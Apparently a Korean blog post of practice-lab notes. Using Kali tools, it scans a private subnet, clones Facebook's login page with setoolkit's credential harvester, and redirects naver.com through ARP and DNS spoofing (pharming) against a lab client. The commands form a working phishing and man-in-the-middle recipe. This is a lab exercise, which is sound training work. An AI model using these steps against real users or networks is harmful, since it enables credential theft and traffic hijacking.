SMALL
정보 수집 실습
칼리 터미널 열기 > fping -g 192.168.10.0/24
192.168.10.0 내에서 활성화된 시스템을 확인해 공격대상 식별
칼리 터미널 > nmap -O 192.168.10.30
특정 호스트 192.168.10.30의 운영체제 확인
사이트 복제 실습
1. kali 터미널 열기 > service apach2 start
2. client에서 주소창에 192.168.10.50(칼리 ip)
3. kali 터미널 열기 > setoolkit > 1) Socisl-Engineering Attacks > 2) Web Attack Vector > 3) Credential Harvest Attack Method > 2) Site Cloner
4. 공격자 IP 주소 입력 : 192.168.10.50
복제할 사이트 : www.facebook.com
5. 클라이언트에서 http://192.168.10.50 확인
6. 칼리에서 터미널 열기 > cat /var/www/html/index.html (사이트가 복제되었는지 확인)
ARP Spoofing & DNS Spoofing를 이용한 Pharming
클라이언트 명령 프롬프트 > nslookup www.naver.com
칼리 터미널에서 ifconfig
arpspoof 서비스를 이용해서 ARP Spoofing 수행
arpspoof -i eth0 -t 192.168.10.40 192.168.10.2
//arpspoof -i 인터페이스 -t 희생자IP 게이트웨이IP
DNS 테이블 생성
칼리 터미널
cd /
vi dns
192.168.10.50 www.naver.com
Client에서 www.naver.com 의 IP주소 확인
nslookup www.naver.com
192.168.10.50으로 변경된걸 볼 수 있음
댓글